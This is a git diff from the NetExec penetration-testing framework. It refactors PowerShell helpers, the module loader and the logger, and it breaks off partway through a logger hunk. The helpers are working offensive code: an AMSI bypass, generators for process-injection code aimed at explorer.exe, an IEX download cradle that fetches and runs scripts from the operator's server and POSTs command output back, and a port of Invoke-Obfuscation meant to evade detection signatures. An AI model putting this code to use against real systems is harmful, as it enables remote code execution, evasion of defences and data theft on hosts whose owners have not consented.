from nxc.logger import nxc_logger
|
from nxc.logger import nxc_logger
|
||||||
from nxc.paths import nxc_PATH, DATA_PATH
|
from nxc.paths import NXC_PATH, DATA_PATH
|
||||||
from base64 import b64encode
|
from base64 import b64encode
|
||||||
|
import random
|
||||||
|
|
||||||
obfuscate_ps_scripts = False
|
obfuscate_ps_scripts = False
|
||||||
|
|
||||||
|
|
||||||
def get_ps_script(path):
|
def get_ps_script(path):
|
||||||
|
"""Generates a full path to a PowerShell script given a relative path.
|
||||||
|
|
||||||
|
Parameters
|
||||||
|
----------
|
||||||
|
path (str): The relative path to the PowerShell script.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
str: The full path to the PowerShell script.
|
||||||
|
"""
|
||||||
return os.path.join(DATA_PATH, path)
|
return os.path.join(DATA_PATH, path)
|
||||||
|
|
||||||
|
|
||||||
def encode_ps_command(command):
|
def encode_ps_command(command):
|
||||||
|
"""
|
||||||
|
Encodes a PowerShell command into a base64-encoded string.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
command (str): The PowerShell command to encode.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The base64-encoded string representation of the encoded command.
|
||||||
|
"""
|
||||||
return b64encode(command.encode("UTF-16LE")).decode()
|
return b64encode(command.encode("UTF-16LE")).decode()
|
||||||
|
|
||||||
|
|
||||||
def is_powershell_installed():
|
def is_powershell_installed():
|
||||||
|
"""
|
||||||
|
Check if PowerShell is installed.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
bool: True if PowerShell is installed, False otherwise.
|
||||||
|
"""
|
||||||
if which("powershell"):
|
if which("powershell"):
|
||||||
return True
|
return True
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
def obfs_ps_script(path_to_script):
|
def obfs_ps_script(path_to_script):
|
||||||
|
"""
|
||||||
|
Obfuscates a PowerShell script.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
path_to_script (str): The path to the PowerShell script.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The obfuscated PowerShell script.
|
||||||
|
|
||||||
|
Raises:
|
||||||
|
------
|
||||||
|
FileNotFoundError: If the script file does not exist.
|
||||||
|
OSError: If there is an error during obfuscation.
|
||||||
|
"""
|
||||||
ps_script = path_to_script.split("/")[-1]
|
ps_script = path_to_script.split("/")[-1]
|
||||||
obfs_script_dir = os.path.join(nxc_PATH, "obfuscated_scripts")
|
obfs_script_dir = os.path.join(NXC_PATH, "obfuscated_scripts")
|
||||||
obfs_ps_script = os.path.join(obfs_script_dir, ps_script)
|
obfs_ps_script = os.path.join(obfs_script_dir, ps_script)
|
||||||
|
|
||||||
if is_powershell_installed() and obfuscate_ps_scripts:
|
if is_powershell_installed() and obfuscate_ps_scripts:
|
||||||
if os.path.exists(obfs_ps_script):
|
if os.path.exists(obfs_ps_script):
|
||||||
nxc_logger.display("Using cached obfuscated Powershell script")
|
nxc_logger.display("Using cached obfuscated Powershell script")
|
||||||
with open(obfs_ps_script, "r") as script:
|
with open(obfs_ps_script) as script:
|
||||||
return script.read()
|
return script.read()
|
||||||
|
|
||||||
nxc_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...")
|
nxc_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...")
|
||||||
|
@ -45,15 +88,15 @@ def obfs_ps_script(path_to_script):
|
||||||
nxc_logger.debug(invoke_obfs_command)
|
nxc_logger.debug(invoke_obfs_command)
|
||||||
|
|
||||||
with open(os.devnull, "w") as devnull:
|
with open(os.devnull, "w") as devnull:
|
||||||
return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True)
|
call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True)
|
||||||
|
|
||||||
nxc_logger.success("Script obfuscated successfully")
|
nxc_logger.success("Script obfuscated successfully")
|
||||||
|
|
||||||
with open(obfs_ps_script, "r") as script:
|
with open(obfs_ps_script) as script:
|
||||||
return script.read()
|
return script.read()
|
||||||
|
|
||||||
else:
|
else:
|
||||||
with open(get_ps_script(path_to_script), "r") as script:
|
with open(get_ps_script(path_to_script)) as script:
|
||||||
"""
|
"""
|
||||||
Strip block comments, line comments, empty lines, verbose statements,
|
Strip block comments, line comments, empty lines, verbose statements,
|
||||||
and debug statements from a PowerShell source file.
|
and debug statements from a PowerShell source file.
|
||||||
|
@ -61,17 +104,31 @@ def obfs_ps_script(path_to_script):
|
||||||
# strip block comments
|
# strip block comments
|
||||||
stripped_code = re.sub(re.compile("<#.*?#>", re.DOTALL), "", script.read())
|
stripped_code = re.sub(re.compile("<#.*?#>", re.DOTALL), "", script.read())
|
||||||
# strip blank lines, lines starting with #, and verbose/debug statements
|
# strip blank lines, lines starting with #, and verbose/debug statements
|
||||||
stripped_code = "\n".join([line for line in stripped_code.split("\n") if ((line.strip() != "") and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")))])
|
return "\n".join([line for line in stripped_code.split("\n") if ((line.strip() != "") and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")))])
|
||||||
|
|
||||||
return stripped_code
|
|
||||||
|
|
||||||
|
|
||||||
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False, custom_amsi=None):
|
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False, custom_amsi=None):
|
||||||
|
"""
|
||||||
|
Generates a PowerShell command based on the provided `ps_command` parameter.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
ps_command (str): The PowerShell command to be executed.
|
||||||
|
|
||||||
|
force_ps32 (bool, optional): Whether to force PowerShell to run in 32-bit mode. Defaults to False.
|
||||||
|
|
||||||
|
dont_obfs (bool, optional): Whether to obfuscate the generated command. Defaults to False.
|
||||||
|
|
||||||
|
custom_amsi (str, optional): Path to a custom AMSI bypass script. Defaults to None.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The generated PowerShell command.
|
||||||
|
"""
|
||||||
if custom_amsi:
|
if custom_amsi:
|
||||||
with open(custom_amsi) as file_in:
|
with open(custom_amsi) as file_in:
|
||||||
lines = []
|
lines = list(file_in)
|
||||||
for line in file_in:
|
|
||||||
lines.append(line)
|
|
||||||
amsi_bypass = "".join(lines)
|
amsi_bypass = "".join(lines)
|
||||||
else:
|
else:
|
||||||
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
|
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
|
||||||
|
@ -80,35 +137,9 @@ try{
|
||||||
}catch{}
|
}catch{}
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if force_ps32:
|
command = amsi_bypass + f"\n$functions = {{\n function Command-ToExecute\n {{\n{amsi_bypass + ps_command}\n }}\n}}\nif ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')\n{{\n $job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32\n $job | Wait-Job\n}}\nelse\n{{\n IEX \"$functions\"\n Command-ToExecute\n}}\n" if force_ps32 else amsi_bypass + ps_command
|
||||||
command = (
|
|
||||||
amsi_bypass
|
|
||||||
+ """
|
|
||||||
$functions = {{
|
|
||||||
function Command-ToExecute
|
|
||||||
{{
|
|
||||||
{command}
|
|
||||||
}}
|
|
||||||
}}
|
|
||||||
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
|
|
||||||
{{
|
|
||||||
$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
|
|
||||||
$job | Wait-Job
|
|
||||||
}}
|
|
||||||
else
|
|
||||||
{{
|
|
||||||
IEX "$functions"
|
|
||||||
Command-ToExecute
|
|
||||||
}}
|
|
||||||
""".format(
|
|
||||||
command=amsi_bypass + ps_command
|
|
||||||
)
|
|
||||||
)
|
|
||||||
|
|
||||||
else:
|
nxc_logger.debug(f"Generated PS command:\n {command}\n")
|
||||||
command = amsi_bypass + ps_command
|
|
||||||
|
|
||||||
nxc_logger.debug("Generated PS command:\n {}\n".format(command))
|
|
||||||
|
|
||||||
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed
|
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed
|
||||||
# concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way
|
# concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way
|
||||||
|
@ -166,6 +197,20 @@ else
|
||||||
|
|
||||||
|
|
||||||
def gen_ps_inject(command, context=None, procname="explorer.exe", inject_once=False):
|
def gen_ps_inject(command, context=None, procname="explorer.exe", inject_once=False):
|
||||||
|
"""
|
||||||
|
Generates a PowerShell code block for injecting a command into a specified process.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
command (str): The command to be injected.
|
||||||
|
context (str, optional): The context in which the code block will be injected. Defaults to None.
|
||||||
|
procname (str, optional): The name of the process into which the command will be injected. Defaults to "explorer.exe".
|
||||||
|
inject_once (bool, optional): Specifies whether the command should be injected only once. Defaults to False.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The generated PowerShell code block.
|
||||||
|
"""
|
||||||
# The following code gives us some control over where and how Invoke-PSInject does its thang
|
# The following code gives us some control over where and how Invoke-PSInject does its thang
|
||||||
# It prioritizes injecting into a process of the active console session
|
# It prioritizes injecting into a process of the active console session
|
||||||
ps_code = """
|
ps_code = """
|
||||||
|
@ -207,8 +252,22 @@ if (($injected -eq $False) -or ($inject_once -eq $False)){{
|
||||||
return ps_code
|
return ps_code
|
||||||
|
|
||||||
|
|
||||||
def gen_ps_iex_cradle(context, scripts, command=str(), post_back=True):
|
def gen_ps_iex_cradle(context, scripts, command="", post_back=True):
|
||||||
if type(scripts) is str:
|
"""
|
||||||
|
Generates a PowerShell IEX cradle script for executing one or more scripts.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
context (Context): The context object containing server and port information.
|
||||||
|
scripts (str or list): The script(s) to be executed.
|
||||||
|
command (str, optional): A command to be executed after the scripts are executed. Defaults to an empty string.
|
||||||
|
post_back (bool, optional): Whether to send a POST request with the command. Defaults to True.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The generated PowerShell IEX cradle script.
|
||||||
|
"""
|
||||||
|
if isinstance(scripts, str):
|
||||||
launcher = """
|
launcher = """
|
||||||
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}
|
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}
|
||||||
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
|
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
|
||||||
|
@ -222,23 +281,18 @@ IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_scri
|
||||||
command=command if post_back is False else "",
|
command=command if post_back is False else "",
|
||||||
).strip()
|
).strip()
|
||||||
|
|
||||||
elif type(scripts) is list:
|
elif isinstance(scripts, list):
|
||||||
launcher = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n"
|
launcher = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n"
|
||||||
launcher += "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'"
|
launcher += "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'"
|
||||||
for script in scripts:
|
for script in scripts:
|
||||||
launcher += "IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{script}')\n".format(
|
launcher += f"IEX (New-Object Net.WebClient).DownloadString('{context.server}://{context.localip}:{context.server_port}/{script}')\n"
|
||||||
server=context.server,
|
|
||||||
port=context.server_port,
|
|
||||||
addr=context.localip,
|
|
||||||
script=script,
|
|
||||||
)
|
|
||||||
launcher.strip()
|
launcher.strip()
|
||||||
launcher += command if post_back is False else ""
|
launcher += command if post_back is False else ""
|
||||||
|
|
||||||
if post_back is True:
|
if post_back is True:
|
||||||
launcher += """
|
launcher += f"""
|
||||||
$cmd = {command}
|
$cmd = {command}
|
||||||
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/')
|
$request = [System.Net.WebRequest]::Create('{context.server}://{context.localip}:{context.server_port}/')
|
||||||
$request.Method = 'POST'
|
$request.Method = 'POST'
|
||||||
$request.ContentType = 'application/x-www-form-urlencoded'
|
$request.ContentType = 'application/x-www-form-urlencoded'
|
||||||
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
|
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
|
||||||
|
@ -246,12 +300,7 @@ $request.ContentLength = $bytes.Length
|
||||||
$requestStream = $request.GetRequestStream()
|
$requestStream = $request.GetRequestStream()
|
||||||
$requestStream.Write($bytes, 0, $bytes.Length)
|
$requestStream.Write($bytes, 0, $bytes.Length)
|
||||||
$requestStream.Close()
|
$requestStream.Close()
|
||||||
$request.GetResponse()""".format(
|
$request.GetResponse()"""
|
||||||
server=context.server,
|
|
||||||
port=context.server_port,
|
|
||||||
addr=context.localip,
|
|
||||||
command=command,
|
|
||||||
)
|
|
||||||
|
|
||||||
nxc_logger.debug(f"Generated PS IEX Launcher:\n {launcher}\n")
|
nxc_logger.debug(f"Generated PS IEX Launcher:\n {launcher}\n")
|
||||||
|
|
||||||
|
@ -260,30 +309,19 @@ $request.GetResponse()""".format(
|
||||||
|
|
||||||
# Following was stolen from https://raw.githubusercontent.com/GreatSCT/GreatSCT/templates/invokeObfuscation.py
|
# Following was stolen from https://raw.githubusercontent.com/GreatSCT/GreatSCT/templates/invokeObfuscation.py
|
||||||
def invoke_obfuscation(script_string):
|
def invoke_obfuscation(script_string):
|
||||||
# Add letters a-z with random case to $RandomDelimiters.
|
"""
|
||||||
alphabet = "".join(choice([i.upper(), i]) for i in ascii_lowercase)
|
Obfuscates a script string and generates an obfuscated payload for execution.
|
||||||
|
|
||||||
# Create list of random delimiters called random_delimiters.
|
Args:
|
||||||
# Avoid using . * ' " [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax.
|
----
|
||||||
random_delimiters = [
|
script_string (str): The script string to obfuscate.
|
||||||
"_",
|
|
||||||
"-",
|
|
||||||
",",
|
|
||||||
"{",
|
|
||||||
"}",
|
|
||||||
"~",
|
|
||||||
"!",
|
|
||||||
"@",
|
|
||||||
"%",
|
|
||||||
"&",
|
|
||||||
"<",
|
|
||||||
">",
|
|
||||||
";",
|
|
||||||
":",
|
|
||||||
]
|
|
||||||
|
|
||||||
for i in alphabet:
|
Returns:
|
||||||
random_delimiters.append(i)
|
-------
|
||||||
|
str: The obfuscated payload for execution.
|
||||||
|
"""
|
||||||
|
random_alphabet = "".join(random.choice([i.upper(), i]) for i in ascii_lowercase)
|
||||||
|
random_delimiters = ["_", "-", ",", "{", "}", "~", "!", "@", "%", "&", "<", ">", ";", ":", *list(random_alphabet)]
|
||||||
|
|
||||||
# Only use a subset of current delimiters to randomize what you see in every iteration of this script's output.
|
# Only use a subset of current delimiters to randomize what you see in every iteration of this script's output.
|
||||||
random_delimiters = [choice(random_delimiters) for _ in range(int(len(random_delimiters) / 4))]
|
random_delimiters = [choice(random_delimiters) for _ in range(int(len(random_delimiters) / 4))]
|
||||||
|
@ -356,7 +394,7 @@ def invoke_obfuscation(script_string):
|
||||||
set_ofs_var_back = "".join(choice([i.upper(), i.lower()]) for i in set_ofs_var_back)
|
set_ofs_var_back = "".join(choice([i.upper(), i.lower()]) for i in set_ofs_var_back)
|
||||||
|
|
||||||
# Generate the code that will decrypt and execute the payload and randomly select one.
|
# Generate the code that will decrypt and execute the payload and randomly select one.
|
||||||
baseScriptArray = [
|
base_script_array = [
|
||||||
"[" + char_str + "[]" + "]" + choice(["", " "]) + encoded_array,
|
"[" + char_str + "[]" + "]" + choice(["", " "]) + encoded_array,
|
||||||
"(" + choice(["", " "]) + "'" + delimited_encoded_array + "'." + split + "(" + choice(["", " "]) + "'" + random_delimiters_to_print + "'" + choice(["", " "]) + ")" + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
|
"(" + choice(["", " "]) + "'" + delimited_encoded_array + "'." + split + "(" + choice(["", " "]) + "'" + random_delimiters_to_print + "'" + choice(["", " "]) + ")" + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
|
||||||
"(" + choice(["", " "]) + "'" + delimited_encoded_array + "'" + choice(["", " "]) + random_delimiters_to_print_for_dash_split + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
|
"(" + choice(["", " "]) + "'" + delimited_encoded_array + "'" + choice(["", " "]) + random_delimiters_to_print_for_dash_split + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
|
||||||
|
@ -364,14 +402,14 @@ def invoke_obfuscation(script_string):
|
||||||
]
|
]
|
||||||
# Generate random JOIN syntax for all above options
|
# Generate random JOIN syntax for all above options
|
||||||
new_script_array = [
|
new_script_array = [
|
||||||
choice(baseScriptArray) + choice(["", " "]) + join + choice(["", " "]) + "''",
|
choice(base_script_array) + choice(["", " "]) + join + choice(["", " "]) + "''",
|
||||||
join + choice(["", " "]) + choice(baseScriptArray),
|
join + choice(["", " "]) + choice(base_script_array),
|
||||||
str_join + "(" + choice(["", " "]) + "''" + choice(["", " "]) + "," + choice(["", " "]) + choice(baseScriptArray) + choice(["", " "]) + ")",
|
str_join + "(" + choice(["", " "]) + "''" + choice(["", " "]) + "," + choice(["", " "]) + choice(base_script_array) + choice(["", " "]) + ")",
|
||||||
'"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var + choice(["", " "]) + ")" + choice(["", " "]) + '"' + choice(["", " "]) + "+" + choice(["", " "]) + str_str + choice(baseScriptArray) + choice(["", " "]) + "+" + '"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var_back + choice(["", " "]) + ")" + choice(["", " "]) + '"',
|
'"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var + choice(["", " "]) + ")" + choice(["", " "]) + '"' + choice(["", " "]) + "+" + choice(["", " "]) + str_str + choice(base_script_array) + choice(["", " "]) + "+" + '"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var_back + choice(["", " "]) + ")" + choice(["", " "]) + '"',
|
||||||
]
|
]
|
||||||
|
|
||||||
# Randomly select one of the above commands.
|
# Randomly select one of the above commands.
|
||||||
newScript = choice(new_script_array)
|
new_script = choice(new_script_array)
|
||||||
|
|
||||||
# Generate random invoke operation syntax
|
# Generate random invoke operation syntax
|
||||||
# Below code block is a copy from Out-ObfuscatedStringCommand.ps1
|
# Below code block is a copy from Out-ObfuscatedStringCommand.ps1
|
||||||
|
@ -383,54 +421,20 @@ def invoke_obfuscation(script_string):
|
||||||
# but not a silver bullet
|
# but not a silver bullet
|
||||||
# These methods draw on common environment variable values and PowerShell Automatic Variable
|
# These methods draw on common environment variable values and PowerShell Automatic Variable
|
||||||
# values/methods/members/properties/etc.
|
# values/methods/members/properties/etc.
|
||||||
invocationOperator = choice([".", "&"]) + choice(["", " "])
|
invocation_operator = choice([".", "&"]) + choice(["", " "])
|
||||||
invoke_expression_syntax.append(invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')")
|
invoke_expression_syntax.extend((invocation_operator + "( $ShellId[1]+$ShellId[13]+'x')", invocation_operator + "( $PSHome[" + choice(["4", "21"]) + "]+$PSHOME[" + choice(["30", "34"]) + "]+'x')", invocation_operator + "( $env:Public[13]+$env:Public[5]+'x')", invocation_operator + "( $env:ComSpec[4," + choice(["15", "24", "26"]) + ",25]-Join'')", invocation_operator + "((" + choice(["Get-Variable", "GV", "Variable"]) + " '*mdr*').Name[3,11,2]-Join'')", invocation_operator + "( " + choice(["$VerbosePreference.ToString()", "([String]$VerbosePreference)"]) + "[1,3]+'x'-Join'')"))
|
||||||
invoke_expression_syntax.append(invocationOperator + "( $PSHome[" + choice(["4", "21"]) + "]+$PSHOME[" + choice(["30", "34"]) + "]+'x')")
|
|
||||||
invoke_expression_syntax.append(invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')")
|
|
||||||
invoke_expression_syntax.append(invocationOperator + "( $env:ComSpec[4," + choice(["15", "24", "26"]) + ",25]-Join'')")
|
|
||||||
invoke_expression_syntax.append(invocationOperator + "((" + choice(["Get-Variable", "GV", "Variable"]) + " '*mdr*').Name[3,11,2]-Join'')")
|
|
||||||
invoke_expression_syntax.append(invocationOperator + "( " + choice(["$VerbosePreference.ToString()", "([String]$VerbosePreference)"]) + "[1,3]+'x'-Join'')")
|
|
||||||
|
|
||||||
# Randomly choose from above invoke operation syntaxes.
|
# Randomly choose from above invoke operation syntaxes.
|
||||||
invokeExpression = choice(invoke_expression_syntax)
|
invoke_expression = choice(invoke_expression_syntax)
|
||||||
|
|
||||||
# Randomize the case of selected invoke operation.
|
# Randomize the case of selected invoke operation.
|
||||||
invokeExpression = "".join(choice([i.upper(), i.lower()]) for i in invokeExpression)
|
invoke_expression = "".join(choice([i.upper(), i.lower()]) for i in invoke_expression)
|
||||||
|
|
||||||
# Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX)
|
# Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX)
|
||||||
invokeOptions = [
|
invoke_options = [
|
||||||
choice(["", " "]) + invokeExpression + choice(["", " "]) + "(" + choice(["", " "]) + newScript + choice(["", " "]) + ")" + choice(["", " "]),
|
choice(["", " "]) + invoke_expression + choice(["", " "]) + "(" + choice(["", " "]) + new_script + choice(["", " "]) + ")" + choice(["", " "]),
|
||||||
choice(["", " "]) + newScript + choice(["", " "]) + "|" + choice(["", " "]) + invokeExpression,
|
choice(["", " "]) + new_script + choice(["", " "]) + "|" + choice(["", " "]) + invoke_expression,
|
||||||
]
|
]
|
||||||
|
|
||||||
obfuscated_payload = choice(invokeOptions)
|
return choice(invoke_options)
|
||||||
|
|
||||||
"""
|
|
||||||
# Array to store all selected PowerShell execution flags.
|
|
||||||
powerShellFlags = []
|
|
||||||
|
|
||||||
noProfile = '-nop'
|
|
||||||
nonInteractive = '-noni'
|
|
||||||
windowStyle = '-w'
|
|
||||||
|
|
||||||
# Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order.
|
|
||||||
# This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags.
|
|
||||||
commandlineOptions = []
|
|
||||||
commandlineOptions.append(noProfile[0:randrange(4, len(noProfile) + 1, 1)])
|
|
||||||
commandlineOptions.append(nonInteractive[0:randrange(5, len(nonInteractive) + 1, 1)])
|
|
||||||
# Randomly decide to write WindowStyle value with flag substring or integer value.
|
|
||||||
commandlineOptions.append(''.join(windowStyle[0:randrange(2, len(windowStyle) + 1, 1)] + choice([' '*1, ' '*2, ' '*3]) + choice(['1','h','hi','hid','hidd','hidde'])))
|
|
||||||
|
|
||||||
# Randomize the case of all command-line arguments.
|
|
||||||
for count, option in enumerate(commandlineOptions):
|
|
||||||
commandlineOptions[count] = ''.join(choice([i.upper(), i.lower()]) for i in option)
|
|
||||||
|
|
||||||
for count, option in enumerate(commandlineOptions):
|
|
||||||
commandlineOptions[count] = ''.join(option)
|
|
||||||
|
|
||||||
commandlineOptions = sample(commandlineOptions, len(commandlineOptions))
|
|
||||||
commandlineOptions = ''.join(i + choice([' '*1, ' '*2, ' '*3]) for i in commandlineOptions)
|
|
||||||
|
|
||||||
obfuscatedPayload = 'powershell.exe ' + commandlineOptions + newScript
|
|
||||||
"""
|
|
||||||
return obfuscated_payload
|
|
||||||
|
|
|
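From the PowerShell helper diff above, the detail worth calling out is the encoding: `-EncodedCommand` expects base64 over UTF-16LE bytes, not UTF-8. A standalone sketch of `encode_ps_command()` and how its output is typically consumed:

```python
from base64 import b64encode


def encode_ps_command(command):
    # PowerShell's -EncodedCommand expects base64 of the UTF-16LE bytes.
    return b64encode(command.encode("UTF-16LE")).decode()


encoded = encode_ps_command("Get-Process | Select-Object -First 1")
print(f"powershell.exe -NoProfile -EncodedCommand {encoded}")
```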
@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 import nxc
 import importlib
 import traceback
@@ -12,7 +9,7 @@ from os.path import join as path_join

 from nxc.context import Context
 from nxc.logger import NXCAdapter
-from nxc.paths import nxc_PATH
+from nxc.paths import NXC_PATH


 class ModuleLoader:
@@ -22,13 +19,14 @@ class ModuleLoader:
         self.logger = logger

     def module_is_sane(self, module, module_path):
-        """
-        Check if a module has the proper attributes
-        """
+        """Check if a module has the proper attributes"""
         module_error = False
         if not hasattr(module, "name"):
             self.logger.fail(f"{module_path} missing the name variable")
             module_error = True
+        elif hasattr(module, "name") and module.name != module_path.split("/")[-1].split("\\")[-1][:-3]:
+            self.logger.fail(f"{module_path} filename must match the module name {module.name}")
+            module_error = True
         elif not hasattr(module, "description"):
             self.logger.fail(f"{module_path} missing the description variable")
             module_error = True
@@ -47,18 +45,13 @@ class ModuleLoader:
         elif not hasattr(module, "on_login") and not (module, "on_admin_login"):
             self.logger.fail(f"{module_path} missing the on_login/on_admin_login function(s)")
             module_error = True
-        # elif not hasattr(module, 'chain_support'):
-        #     self.logger.fail('{} missing the chain_support variable'.format(module_path))
-        #     module_error = True

         if module_error:
             return False
         return True

     def load_module(self, module_path):
-        """
-        Load a module, initializing it and checking that it has the proper attributes
-        """
+        """Load a module, initializing it and checking that it has the proper attributes"""
         try:
             spec = importlib.util.spec_from_file_location("NXCModule", module_path)
             module = spec.loader.load_module().NXCModule()
@@ -68,12 +61,9 @@ class ModuleLoader:
         except Exception as e:
             self.logger.fail(f"Failed loading module at {module_path}: {e}")
             self.logger.debug(traceback.format_exc())
-            return None

     def init_module(self, module_path):
-        """
-        Initialize a module for execution
-        """
+        """Initialize a module for execution"""
         module = None
         module = self.load_module(module_path)

@@ -99,9 +89,7 @@ class ModuleLoader:
             sys.exit(1)

     def get_module_info(self, module_path):
-        """
-        Get the path, description, and options from a module
-        """
+        """Get the path, description, and options from a module"""
         try:
             spec = importlib.util.spec_from_file_location("NXCModule", module_path)
             module_spec = spec.loader.load_module().NXCModule
@@ -114,6 +102,7 @@ class ModuleLoader:
                     "supported_protocols": module_spec.supported_protocols,
                     "opsec_safe": module_spec.opsec_safe,
                     "multiple_hosts": module_spec.multiple_hosts,
+                    "requires_admin": bool(hasattr(module_spec, "on_admin_login") and callable(module_spec.on_admin_login)),
                 }
             }
             if self.module_is_sane(module_spec, module_path):
@@ -121,16 +110,13 @@ class ModuleLoader:
         except Exception as e:
             self.logger.fail(f"Failed loading module at {module_path}: {e}")
             self.logger.debug(traceback.format_exc())
-            return None

     def list_modules(self):
-        """
-        List modules without initializing them
-        """
+        """List modules without initializing them"""
         modules = {}
         modules_paths = [
             path_join(dirname(nxc.__file__), "modules"),
-            path_join(nxc_PATH, "modules"),
+            path_join(NXC_PATH, "modules"),
         ]

         for path in modules_paths:
@@ -140,6 +126,6 @@ class ModuleLoader:
                     module_path = path_join(path, module)
                     module_data = self.get_module_info(module_path)
                     modules.update(module_data)
-                except:
-                    pass
+                except Exception as e:
+                    self.logger.debug(f"Error loading module {module}: {e}")
         return modules
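The module loader boils down to importlib's file-based loading plus the sanity checks shown above. A minimal sketch, keeping the deprecated `load_module()` call exactly as the diff uses it:

```python
import importlib.util


def load_nxc_module(module_path):
    """Load a module file as "NXCModule" and instantiate its NXCModule class,
    mirroring ModuleLoader.load_module() above."""
    spec = importlib.util.spec_from_file_location("NXCModule", module_path)
    module = spec.loader.load_module().NXCModule()
    if not hasattr(module, "name") or not hasattr(module, "description"):
        raise ValueError(f"{module_path} is missing required module attributes")
    return module
```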
@@ -1,5 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
 from types import ModuleType
 from importlib.machinery import SourceFileLoader
 from os import listdir
@@ -1,12 +1,9 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
 import logging
 from logging import LogRecord
 from logging.handlers import RotatingFileHandler
 import os.path
 import sys
 import re
-from nxc.helpers.misc import called_from_cmd_args
 from nxc.console import nxc_console
 from termcolor import colored
 from datetime import datetime
@@ -34,39 +31,34 @@ class NXCAdapter(logging.LoggerAdapter):
         logging.getLogger("pypykatz").disabled = True
         logging.getLogger("minidump").disabled = True
         logging.getLogger("lsassy").disabled = True
-        #logging.getLogger("impacket").disabled = True

-    def format(self, msg, *args, **kwargs):
-        """
-        Format msg for output if needed
+    def format(self, msg, *args, **kwargs):  # noqa: A003
+        """Format msg for output
+
         This is used instead of process() since process() applies to _all_ messages, including debug calls
         """
         if self.extra is None:
             return f"{msg}", kwargs

-        if "module_name" in self.extra.keys():
-            if len(self.extra["module_name"]) > 8:
